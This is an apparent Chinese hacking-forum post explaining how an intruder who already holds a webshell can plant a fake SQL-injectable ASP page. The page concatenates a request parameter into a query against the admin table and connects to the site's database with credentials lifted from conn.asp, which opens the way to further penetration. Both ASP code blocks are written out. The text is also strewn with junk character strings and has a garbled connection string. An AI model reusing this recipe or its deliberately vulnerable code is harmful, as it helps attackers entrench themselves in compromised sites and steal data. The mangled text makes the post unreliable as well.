自己构造注入点方便入侵& P4 w: M" P! y: G9 r# h
& p& r, ]9 V) M9 [
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
3 Y4 J5 N/ n% F6 X
9 K3 C C6 k5 R/ R3 s/ \# m这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!) m3 N1 ` z8 w& ]
; ^" ^. i; R+ {; S6 m1 L首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
% j5 P- R( O$ b
$ e4 t* ^# e: N- W密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表- A% t$ A* _8 R6 \7 w" X7 W" S
+ s6 y; ]9 Z. n+ i5 I; e因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:1 s- g$ c3 {) v" M. b
2 u6 P' o L, F/ y6 q
程序代码
6 j) [! P0 ^4 z; z<!--#include file="xx.asp"-->4 a: I- _" r. Q7 F& V9 X* a( V5 T
<%8 S6 r d) R" R9 f6 V* `* t
set rs=server.createobject("ADODB.recordset")
; p6 _$ r+ F% [/ t4 W' @2 Bid = request("id")
! k$ f7 G/ K, V9 x6 o$ EstrSQL = "select * from admin where id=" & id5 `) X4 j2 F, V; ^+ g2 R+ P9 T" \
rs.open strSQL,conn,1,3 ]8 V1 s5 x6 V" e
rs.close
g# ]5 Z: h( e3 D$ i( z0 D# N%>! Z5 n: S) t( J3 e: X
9 f, Q* U7 ~9 G9 K
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在+ M8 c% l3 }" N8 A; U3 h* t8 }
: X; H* r" g7 A: X
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!) E- c. Q4 G; k# H% @( C
h; n5 m r/ O; w4 g* o然后就要构造一个连接数据库的文件了,代码如下:
$ a! |7 J" w8 ^程序代码
! q8 |3 G: Q& w% B2 [1 J% r<%
" K4 i) D& y0 ~strSQLServerName = "000.000.000.000" '服务器名称或地址, _& V7 D2 K+ D' R. p
strSQLDBUserName = "sqlname" '数据库帐号
2 u6 v3 E5 f* d3 R" v3 l* MstrSQLDBPassword = "sqlpass" '数据库密码
* F/ _5 R2 S9 h4 N4 ^2 R6 `strSQLDBName = "sqldataname" '数据库名称; z6 w+ K* H* h% b/ d8 A0 M0 I
Set conn = Server.CreateObject("ADODB.Connection")
6 ^( K+ O3 [& I3 N( u/ NstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"( K/ M% J1 [6 [( Z- _
conn.open strCon
- y; q( x$ ~8 I @2 y' w- |+ D%>1 j' T7 f1 H7 O" D# s
3 w8 Q5 x% W9 z! t! ^1 h- ^! S
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,) Z" N" o" S! \9 l+ ]
4 w( X1 p. C+ t* i( q4 R就这样,正常情况下,就OK了,伪造成功……
/ ]! Y' H% `8 t5 I: H6 K U. t1 L
+ E% g1 K4 n4 [, _" c, N0 g 如果有什么问题可以提出来大家一起探讨解决。 |